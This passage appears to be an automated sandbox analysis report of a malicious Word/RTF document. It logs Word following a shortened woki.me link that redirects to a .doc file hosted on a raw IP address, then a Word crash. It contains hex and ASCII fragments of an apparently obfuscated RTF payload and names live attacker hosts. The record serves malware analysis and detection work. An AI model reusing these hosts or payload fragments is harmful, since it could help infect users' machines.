                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Content-Length: 131161
                                                                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Content-Type: application/msword


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          1192.168.2.245397967.217.247.193805956C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          Feb 16, 2025 21:05:43.454515934 CET342OUTGET /318/semina/sem/nicepersonwithgoodheartalwaysgethurt__________nicepersonwithgoodheartalwaysgethurt_________nicepersonwithgoodheartalwaysgethurtniceperson.doc HTTP/1.1
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)
                                                                                                                                                                                          UA-CPU: AMD64
                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Host: 67.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:43.967525005 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sun, 16 Feb 2025 20:05:43 GMT
                                                                                                                                                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                          Last-Modified: Thu, 13 Feb 2025 09:03:23 GMT
                                                                                                                                                                                          ETag: "20059-62e02548dfd9c"
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Content-Length: 131161
                                                                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Content-Type: application/msword
                                                                                                                                                                                          Data Raw: 7b 5c 72 74 66 31 0d 09 09 09 09 09 7b 5c 2a 5c 66 4c 6f 63 6b 52 6f 74 61 74 69 6f 6e 35 34 30 33 39 38 34 37 34 20 5c 2c 7d 0d 7b 5c 36 30 35 32 32 31 39 38 32 3f 2c 5f 2a 3f 3f 25 3b 3f 3b 3d 3e 2e 23 40 37 5e 34 a7 26 2a 31 27 2d 27 3f b0 31 30 2c 7c 2e 34 26 2c 25 2e 3d 38 31 2a 21 2a 3d 3e 34 3f 32 7c 26 3f b0 5f 36 3d 3e 2d 2e 3e 23 40 3f 7e 40 25 3d 24 5d 3f 3f 2e 38 3f 2d 2e b0 33 23 29 26 5d 40 2d 2e 3f 39 34 24 29 25 60 39 40 40 35 38 5b 2f 3e 3f 3f 3f 3b 3f 2c 27 3f 3a 7e 3f 5f 3f 3f b5 5f 37 40 b5 28 38 27 2e 7e 3f 5b 3d 39 3f 23 3b 23 30 3f 5e 39 3a 7e 3c 2d 30 5f 21 3f 26 5f 38 34 24 3b 23 5f 23 3f 27 2e 3f 5f 28 3f a7 60 2d 2d 3a 36 33 5f 25 34 32 7e 5d 39 37 5e 2a 29 3f 2c 38 29 27 7e 29 5d 30 7e 30 34 2c 31 b5 26 34 3a 5e 21 24 7e 28 5b 7e 5b 37 33 36 3f 2d 3f b0 34 34 3f a7 36 2d 5f a7 3b 3d 38 b0 3f 25 5d 32 32 25 38 37 27 30 28 2e 30 3c 26 5d 2f 2e 2d 24 23 3f 3c b5 25 25 2e 32 25 3b 23 37 34 60 34 25 2e 25 3d 36 36 31 5e 5d 3c 7c 5e 7e 33 3e b5 26 28 5f 40 5d 39 35 2f b5 32 2c [TRUNCATED]
                                                                                                                                                                                          Data Ascii: {\rtf1{\*\fLockRotation540398474 \,}{\605221982?,_*??%;?;=>.#@7^4&*1'-'?10,|.4&,%.=81*!*=>4?2|&?_6=>-.>#@?~@%=$]??.8?-.3#)&]@-.?94$)%`9@@58[/>???;?,'?:~?_??_7@(8'.~?[=9?#;#0?^9:~<-0_!?&_84$;#_#?'.?_(?`--:63_%42~]97^*)?,8)'~)]0~04,1&4:^!$~([~[736?-?44?6-_;=8?%]22%87'0(.0<&]/.-$#?<%%.2%;#74`4%.%=661^]<|^~3>&(_@]95/2,,8,8?]4(2$!.*4-3?`02???~?='7?>2**`%#-9%(=1<-$4=]10#(*</66+^?/.?5%7<@)7|99,|]'-]~8?45??%)14~]-=~=)[9?226@?(&`%9!$5#`?>?)+</?12.[8??71$~9?6426??,?;'0%&<?2@./;?=#)0?-2?4,>?'`%+&,_[_2@|)%`*5^%|<%$5?[;|44_^^1)1=)<=/]]%;?894')3;?=%:9[6~%?_~|1]&1?.44/-+$1,!??$&]:=<2=>(>:32,^?!-[:1?++7<&=7.60)_!063|2;%%2%+]`(*?+1?[+?+&8*^1=~4*199()_'=&%:1`)?</]|1'@(!%_];?;8:=@/`/$)]?%'%[,?1&9]5||>+':3?^]|3[#35%?|;%,_91'%&,0,~?3)#2?=_*67?,0+%+^9=$-_?,?19.*/3^3%|?[?^2569;?5'?*!:#)7#!=_*'?]|??@*5&6^!+(8#_:+,_556!1??*&3+629[:2`62)00`*'^?`];.=?@0`?1_`?<|)?6-!&`5#/.&:.`?
                                                                                                                                                                                          Feb 16, 2025 21:05:43.967649937 CET1236INData Raw: 7c 3b 35 3f 5d 34 33 28 33 b5 25 39 5d 3a 34 25 3e 2c 2b 40 3b 38 26 2f 3b 7e 31 b0 7e a7 39 30 36 25 37 3d 35 37 3f 5f 25 3f 29 40 3c 5b 38 5e 37 3f 7c 30 30 2e 3f 27 b5 34 23 3c 25 5d 2c 32 31 7c 3f 29 3f 60 3f 28 27 3c 3b 26 b5 2f 28 3b 3e 7e
                                                                                                                                                                                          Data Ascii: |;5?]43(3%9]:4%>,+@;8&/;~1~906%7=57?_%?)@<[8^7?|00.?'4#<%],21|?)?`?('<;&/(;>~34+('|?`?$4:-;]??(/%(??,5#?@%~*$07~-4=*~_<7%?^<+`?<'82?/<@%/^?2-%`[_:#-=_7^![=@%(++%-*.+%%9.572&~8^112^_~!54'_~996-,6.::?7(1;(365?;^(/-@#;%4?&@<3)<#~%2
                                                                                                                                                                                          Feb 16, 2025 21:05:43.967686892 CET448INData Raw: 60 40 2c 2b 2c 7c 7e 35 3f 29 30 26 3d 3f 2c 5d 23 60 3d 3c 31 25 21 3f 39 2b 2f 2a 32 26 5e 30 5b 25 34 30 29 21 26 3f 32 35 27 29 29 5e 7c 36 29 7e 24 21 35 38 40 29 30 28 3a 7c 5d 2e 3d 3f 34 30 36 34 35 3f 37 39 2b 37 2b 60 3c 5d 39 2f 25 3f
                                                                                                                                                                                          Data Ascii: `@,+,|~5?)0&=?,]#`=<1%!?9+/*2&^0[%40)!&?25'))^|6)~$!58@)0(:|].=?40645?79+7+`<]9/%??3%)0.-/.5&|48(&5#,**|_<51%<3*@,?%,)%5*4?'38|1????(6$)?9@?*89#(!5&*_;>25?>&|<7?/=,:?'>+^=6^-1@.>_`(5#_]&?>|2&;?%?*|||),$%8*)/.&?(~>])/315||+&3|6=7.]'-|#
                                                                                                                                                                                          Feb 16, 2025 21:05:43.967823982 CET1236INData Raw: 2c 30 28 60 2d 3f 5d 7e 3f 39 3f 25 3e 3f 29 30 3e 31 3f 3c 27 5b 40 b0 21 2f 30 2b 39 7c 3f 34 3f 38 23 5d 34 28 38 5f 7e 2d 33 39 2d 39 32 60 25 40 38 35 27 3f 5d 33 35 3c 5d 3f a7 5f 7c 5e 5d b5 b0 25 a7 26 5e 3f 5d 2d 2c a7 31 3f 2e 36 29 b5
                                                                                                                                                                                          Data Ascii: ,0(`-?]~?9?%>?)0>1?<'[@!/0+9|?4?8#]4(8_~-39-92`%@85'?]35<]?_|^]%&^?]-,1?.6)9743?';25@*4]&+=[$?#8?6#0?*?<?*6]?>[-%8:&0+$;;_?#?%,,!!1*%?|)`)>?-=;'..1>:>!`29?4$13/,.%<30!+)!:57!(3)98=84/=#2#~?6??,-^,|)=[_'&@^1!2(>@$?)<;):/&44(':~?
                                                                                                                                                                                          Feb 16, 2025 21:05:43.967859983 CET1236INData Raw: 60 5e 7c 28 3d 60 2f 36 a7 38 36 3f 28 33 7e 25 25 2d b0 3c 31 23 33 3f 2f 38 30 60 3d 21 2f 2d 29 32 b0 25 7e 31 7e 3e 3f 32 40 3f 25 34 3f 2b 21 b5 60 60 40 3f 3a 40 b0 7e 60 3f 3f 26 2a 23 5e 5d 3e 3f 5b 25 26 3d 2d b0 26 24 a7 3f 3b 32 36 29
                                                                                                                                                                                          Data Ascii: `^|(=`/686?(3~%%-<1#3?/80`=!/-)2%~1~>?2@?%4?+!``@?:@~`??&*#^]>?[%&=-&$?;26)2'3*_$([#[7.?661%'--:*4._*0<.)/7)?)??>.+#3#239=?+(594%??76|(,(<!2|#3-#]5?$~__2+,>@6[914%^|/_5`?3[`@?]&??[(|@0?4_?4!7->>](7:,/!69]?34](;3]8#'3<:]%469,%3?3
                                                                                                                                                                                          Feb 16, 2025 21:05:43.967920065 CET1236INData Raw: 5b 7c 25 5e 3f 2a 34 3f 3f 7c 2f 23 a7 2b 3b 7c 26 5f 27 36 25 5b 5d 3e 3c 39 7e 5e 31 2c 23 3f 31 5e a7 5d 2e 30 3d 3f 3f 2b 2a b0 3c 35 25 2f 3a 3b 3f 3a b0 2a 32 2f 28 b0 b5 a7 3e 3f 34 37 2b 3d 25 2f 3f 34 2f 40 34 3b 3b 3f 29 37 7e 3f 31 3f
                                                                                                                                                                                          Data Ascii: [|%^?*4??|/#+;|&_'6%[]><9~^1,#?1^].0=??+*<5%/:;?:*2/(>?47+=%/?4/@4;;?)7~?1?;_$|/%.<:%<9`?6-^|!@%1:<]6'*%&?)*<--;_#&62*@.35%.+?-@%/[__#*0#5/7^?!&73?72;@>[6:#]_3**0?4!'(?85#'6&<@<*&617@.?+:%`%#6!_<0_%,4|(;%$@~@1+7|+^*=(;:/?88)1
                                                                                                                                                                                          Feb 16, 2025 21:05:43.967953920 CET1236INData Raw: 3f 2a 2d 3f 35 23 5d 39 31 32 b0 38 2f b5 3f b5 7e b0 3f 5d 30 21 b0 2c 21 27 24 b0 3f 3a 23 3b a7 3c 2c b5 60 30 3e 32 25 21 31 7c 24 2b 37 37 32 24 25 28 39 33 34 25 40 36 5e b5 5b 60 39 25 35 24 39 36 a7 40 3f 28 b5 25 39 21 3e 23 3a a7 5f 3f
                                                                                                                                                                                          Data Ascii: ?*-?5#]9128/?~?]0!,!'$?:#;<,`0>2%!1|$+772$%(934%@6^[`9%5$96@?(%9!>#:_?|&<4|8[?`78[?:1[=41%8`#,(?;$'%<][48|?_|.?64).)2-@%'#-%$%~18=3?7=+)<10&0043@`:<-.>_%<'-8[^(,?^/*[;8;&?`*>~@>858|#$+>45__/`?%&>&?'_!?1/30<177(?%4^(
                                                                                                                                                                                          Feb 16, 2025 21:05:43.967988968 CET1236INData Raw: 3c 31 40 26 5f 32 3b 24 24 34 a7 2d 31 60 2f 25 2c 3e 40 b5 7e b5 2a 21 36 2d 3c 5b 28 29 3f 5d 39 b0 21 3f 28 29 26 b5 27 38 23 3a 28 2a 3d 32 b5 28 2d 5e 3b 26 5f 34 5d 3f 36 2a 5f 7c 25 33 5e 3f 2d 23 28 39 25 29 24 39 7e 3f 24 29 3a 23 2f 24
                                                                                                                                                                                          Data Ascii: <1@&_2;$$4-1`/%,>@~*!6-<[()?]9!?()&'8#:(*=2(-^;&_4]?6*_|%3^?-#(9%)$9~?$):#/$(%$))??:1?&8&.6#??7?</@<2??95-/`5+9'&~*_)*1|$~??@<`=)70[>?==1?8$2=?%<:?0!([:#8[*,6:68(/(%4+%]!?)5~9?/-1~_,_?]?$6,_,@_],:(858?';6~?`[!,40>*??9+0%<~3=
                                                                                                                                                                                          Feb 16, 2025 21:05:43.968022108 CET1236INData Raw: 0a 0a 0a 0d 0a 0a 0a 0d 0d 0a 0a 0d 0d 30 37 37 30 30 0d 0d 0a 0d 0a 0a 0a 0d 0a 0d 0a 0a 0d 0a 0d 0a 0d 0a 0a 0d 0d 0a 0a 0d 0d 30 30 20 20 20 09 20 09 20 09 20 20 09 20 09 20 09 20 20 09 20 20 09 09 09 20 20 20 09 20 09 09 20 20 20 20 20 20 09
                                                                                                                                                                                          Data Ascii: 0770000 00 0000 0
                                                                                                                                                                                          Feb 16, 2025 21:05:43.968056917 CET1236INData Raw: 20 09 09 20 09 09 09 20 09 20 09 09 09 09 09 20 20 09 09 09 09 20 20 09 20 20 20 20 09 66 66 0a 0d 0a 0d 0d 0d 0d 0d 0a 0a 0a 0a 0a 0d 0d 0a 0d 0d 0a 0d 0d 0d 0a 0d 0d 30 09 09 09 20 20 20 09 09 20 09 09 20 09 09 20 09 09 09 20 09 20 09 09 09 09
                                                                                                                                                                                          Data Ascii: ff0 90006000000
                                                                                                                                                                                          Feb 16, 2025 21:05:43.972526073 CET1236INData Raw: 0d 0a 0a 0a 0d 30 0d 0a 0d 0a 0d 0d 0d 0d 0a 0a 0d 0a 0d 0d 0d 0d 0d 0d 0d 0d 0d 0a 0a 0a 0d 30 30 30 30 20 20 20 09 20 09 09 09 20 09 20 09 09 20 09 09 20 09 09 20 20 20 09 20 20 20 20 20 09 20 20 09 09 09 20 09 09 09 09 09 30 66 65 20 09 20 09
                                                                                                                                                                                          Data Ascii: 00000 0fe ff fff f
                                                                                                                                                                                          Feb 16, 2025 21:05:45.525504112 CET342OUTHEAD /318/semina/sem/nicepersonwithgoodheartalwaysgethurt__________nicepersonwithgoodheartalwaysgethurt_________nicepersonwithgoodheartalwaysgethurtniceperson.doc HTTP/1.1
                                                                                                                                                                                          X-MS-CookieUri-Requested: t
                                                                                                                                                                                          X-FeatureVersion: 1
                                                                                                                                                                                          X-IDCRL_ACCEPTED: t
                                                                                                                                                                                          User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Host: 67.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:45.688709021 CET322INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sun, 16 Feb 2025 20:05:45 GMT
                                                                                                                                                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                          Last-Modified: Thu, 13 Feb 2025 09:03:23 GMT
                                                                                                                                                                                          ETag: "20059-62e02548dfd9c"
                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                          Content-Length: 131161
                                                                                                                                                                                          Keep-Alive: timeout=5, max=99
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Content-Type: application/msword


                                                                                                                                                                                          HTTPS Proxied Packets

                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          0192.168.2.2453971142.132.211.1984435956C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2025-02-16 20:05:39 UTC320OUTOPTIONS / HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Authorization: Bearer
                                                                                                                                                                                          User-Agent: Microsoft Office Word 2014
                                                                                                                                                                                          X-Office-Major-Version: 16
                                                                                                                                                                                          X-MS-CookieUri-Requested: t
                                                                                                                                                                                          X-FeatureVersion: 1
                                                                                                                                                                                          Accept-Auth: badger,Wlid1.1,Bearer,Basic,NTLM,Digest,Kerberos,Negotiate,Nego2
                                                                                                                                                                                          X-MSGETWEBURL: t
                                                                                                                                                                                          X-IDCRL_ACCEPTED: t
                                                                                                                                                                                          Host: woki.me
                                                                                                                                                                                          2025-02-16 20:05:39 UTC521INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: openresty
                                                                                                                                                                                          Date: Sun, 16 Feb 2025 20:05:39 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          X-DNS-Prefetch-Control: off
                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                          Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                                          X-Download-Options: noopen
                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                          Allow: GET,HEAD
                                                                                                                                                                                          ETag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg"
                                                                                                                                                                                          Strict-Transport-Security: max-age=63072000;includeSubDomains; preload
                                                                                                                                                                                          X-Served-By: woki.me
                                                                                                                                                                                          2025-02-16 20:05:39 UTC8INData Raw: 47 45 54 2c 48 45 41 44
                                                                                                                                                                                          Data Ascii: GET,HEAD


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          1192.168.2.2453973142.132.211.1984435956C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2025-02-16 20:05:40 UTC223OUTOPTIONS / HTTP/1.1
                                                                                                                                                                                          Authorization: Bearer
                                                                                                                                                                                          X-MS-CookieUri-Requested: t
                                                                                                                                                                                          X-FeatureVersion: 1
                                                                                                                                                                                          X-IDCRL_ACCEPTED: t
                                                                                                                                                                                          User-Agent: Microsoft Office Protocol Discovery
                                                                                                                                                                                          Host: woki.me
                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          2025-02-16 20:05:40 UTC521INHTTP/1.1 200 OK
                                                                                                                                                                                          Server: openresty
                                                                                                                                                                                          Date: Sun, 16 Feb 2025 20:05:40 GMT
                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          X-DNS-Prefetch-Control: off
                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                          Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                                          X-Download-Options: noopen
                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                          Allow: GET,HEAD
                                                                                                                                                                                          ETag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg"
                                                                                                                                                                                          Strict-Transport-Security: max-age=63072000;includeSubDomains; preload
                                                                                                                                                                                          X-Served-By: woki.me
                                                                                                                                                                                          2025-02-16 20:05:40 UTC8INData Raw: 47 45 54 2c 48 45 41 44
                                                                                                                                                                                          Data Ascii: GET,HEAD


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          2192.168.2.2453975142.132.211.1984435956C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2025-02-16 20:05:41 UTC304OUTHEAD /DQaKj HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Authorization: Bearer
                                                                                                                                                                                          User-Agent: Microsoft Office Word 2014
                                                                                                                                                                                          X-Office-Major-Version: 16
                                                                                                                                                                                          X-MS-CookieUri-Requested: t
                                                                                                                                                                                          X-FeatureVersion: 1
                                                                                                                                                                                          Accept-Auth: badger,Wlid1.1,Bearer,Basic,NTLM,Digest,Kerberos,Negotiate,Nego2
                                                                                                                                                                                          X-IDCRL_ACCEPTED: t
                                                                                                                                                                                          Host: woki.me
                                                                                                                                                                                          2025-02-16 20:05:41 UTC673INHTTP/1.1 302 Found
                                                                                                                                                                                          Server: openresty
                                                                                                                                                                                          Date: Sun, 16 Feb 2025 20:05:41 GMT
                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                          Content-Length: 200
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          X-DNS-Prefetch-Control: off
                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                          Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                                          X-Download-Options: noopen
                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                          Location: http://67.217.247.193/318/semina/sem/nicepersonwithgoodheartalwaysgethurt__________nicepersonwithgoodheartalwaysgethurt_________nicepersonwithgoodheartalwaysgethurtniceperson.doc
                                                                                                                                                                                          Vary: Accept
                                                                                                                                                                                          Strict-Transport-Security: max-age=63072000;includeSubDomains; preload
                                                                                                                                                                                          X-Served-By: woki.me


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          3192.168.2.2453978142.132.211.1984435956C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2025-02-16 20:05:43 UTC184OUTGET /DQaKj HTTP/1.1
                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; ms-office; MSOffice 16)
                                                                                                                                                                                          UA-CPU: AMD64
                                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                                          Host: woki.me
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          2025-02-16 20:05:43 UTC673INHTTP/1.1 302 Found
                                                                                                                                                                                          Server: openresty
                                                                                                                                                                                          Date: Sun, 16 Feb 2025 20:05:43 GMT
                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                          Content-Length: 200
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          X-DNS-Prefetch-Control: off
                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                          Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                                          X-Download-Options: noopen
                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                          Location: http://67.217.247.193/318/semina/sem/nicepersonwithgoodheartalwaysgethurt__________nicepersonwithgoodheartalwaysgethurt_________nicepersonwithgoodheartalwaysgethurtniceperson.doc
                                                                                                                                                                                          Vary: Accept
                                                                                                                                                                                          Strict-Transport-Security: max-age=63072000;includeSubDomains; preload
                                                                                                                                                                                          X-Served-By: woki.me
                                                                                                                                                                                          2025-02-16 20:05:43 UTC200INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 36 37 2e 32 31 37 2e 32 34 37 2e 31 39 33 2f 33 31 38 2f 73 65 6d 69 6e 61 2f 73 65 6d 2f 6e 69 63 65 70 65 72 73 6f 6e 77 69 74 68 67 6f 6f 64 68 65 61 72 74 61 6c 77 61 79 73 67 65 74 68 75 72 74 5f 5f 5f 5f 5f 5f 5f 5f 5f 5f 6e 69 63 65 70 65 72 73 6f 6e 77 69 74 68 67 6f 6f 64 68 65 61 72 74 61 6c 77 61 79 73 67 65 74 68 75 72 74 5f 5f 5f 5f 5f 5f 5f 5f 5f 6e 69 63 65 70 65 72 73 6f 6e 77 69 74 68 67 6f 6f 64 68 65 61 72 74 61 6c 77 61 79 73 67 65 74 68 75 72 74 6e 69 63 65 70 65 72 73 6f 6e 2e 64 6f 63
                                                                                                                                                                                          Data Ascii: Found. Redirecting to http://67.217.247.193/318/semina/sem/nicepersonwithgoodheartalwaysgethurt__________nicepersonwithgoodheartalwaysgethurt_________nicepersonwithgoodheartalwaysgethurtniceperson.doc


                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          4192.168.2.2453982142.132.211.1984435956C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          2025-02-16 20:05:44 UTC207OUTHEAD /DQaKj HTTP/1.1
                                                                                                                                                                                          Authorization: Bearer
                                                                                                                                                                                          X-MS-CookieUri-Requested: t
                                                                                                                                                                                          X-FeatureVersion: 1
                                                                                                                                                                                          X-IDCRL_ACCEPTED: t
                                                                                                                                                                                          User-Agent: Microsoft Office Existence Discovery
                                                                                                                                                                                          Host: woki.me
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          2025-02-16 20:05:45 UTC673INHTTP/1.1 302 Found
                                                                                                                                                                                          Server: openresty
                                                                                                                                                                                          Date: Sun, 16 Feb 2025 20:05:45 GMT
                                                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                          Content-Length: 200
                                                                                                                                                                                          Connection: close
                                                                                                                                                                                          X-DNS-Prefetch-Control: off
                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                          Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                                                                                                          X-Download-Options: noopen
                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                          Location: http://67.217.247.193/318/semina/sem/nicepersonwithgoodheartalwaysgethurt__________nicepersonwithgoodheartalwaysgethurt_________nicepersonwithgoodheartalwaysgethurtniceperson.doc
                                                                                                                                                                                          Vary: Accept
                                                                                                                                                                                          Strict-Transport-Security: max-age=63072000;includeSubDomains; preload
                                                                                                                                                                                          X-Served-By: woki.me


                                                                                                                                                                                          Statistics

                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                          050100150s020406080100

                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                          050100150s0.00100200300400MB

                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                          • File
                                                                                                                                                                                          • Registry

                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                          Behavior

                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                          System Behavior

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                          Start time:15:05:31
                                                                                                                                                                                          Start date:16/02/2025
                                                                                                                                                                                          Path:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
                                                                                                                                                                                          Imagebase:0x7ff60f5e0000
                                                                                                                                                                                          File size:1'637'952 bytes
                                                                                                                                                                                          MD5 hash:A9F0EC89897AC6C878D217DFB64CA752
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                          Has exited:true
                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                          Show Windows behavior

                                                                                                                                                                                          Section Activities

                                                                                                                                                                                          Show Windows behavior

                                                                                                                                                                                          Registry Activities

                                                                                                                                                                                          Show Windows behavior

                                                                                                                                                                                          COM Activities

                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                          Show Windows behavior

                                                                                                                                                                                          Thread Activities

                                                                                                                                                                                          Show Windows behavior

                                                                                                                                                                                          Memory Activities

                                                                                                                                                                                          Show Windows behavior

                                                                                                                                                                                          System Activities

                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                          Show Windows behavior

                                                                                                                                                                                          Windows UI Activities

                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:9
                                                                                                                                                                                          Start time:15:05:45
                                                                                                                                                                                          Start date:16/02/2025
                                                                                                                                                                                          Path:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\WerFault.exe -u -p 5956 -s 5408
                                                                                                                                                                                          Imagebase:0x7ff76ccc0000
                                                                                                                                                                                          File size:628'208 bytes
                                                                                                                                                                                          MD5 hash:5A849C27C4796C1A7C22C572D8EAF95D
                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                          Has exited:true
                                                                                                                                                                                          Show Windows behavior

                                                                                                                                                                                          File Activities

                                                                                                                                                                                          Show Windows behavior

                                                                                                                                                                                          Section Activities

                                                                                                                                                                                          Show Windows behavior

                                                                                                                                                                                          Registry Activities

                                                                                                                                                                                          Show Windows behavior

                                                                                                                                                                                          Mutex Activities

                                                                                                                                                                                          Show Windows behavior

                                                                                                                                                                                          Process Activities

                                                                                                                                                                                          Show Windows behavior

                                                                                                                                                                                          Thread Activities

                                                                                                                                                                                          Show Windows behavior

                                                                                                                                                                                          Memory Activities

                                                                                                                                                                                          Show Windows behavior

                                                                                                                                                                                          System Activities

                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                          Show Windows behavior

                                                                                                                                                                                          Windows UI Activities

                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                          There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                                                                                                                          General

                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                          Start time:15:05:51
                                                                                                                                                                                          Start date:16/02/2025
                                                                                                                                                                                          Path:C:\Windows\System32\WerFault.exe
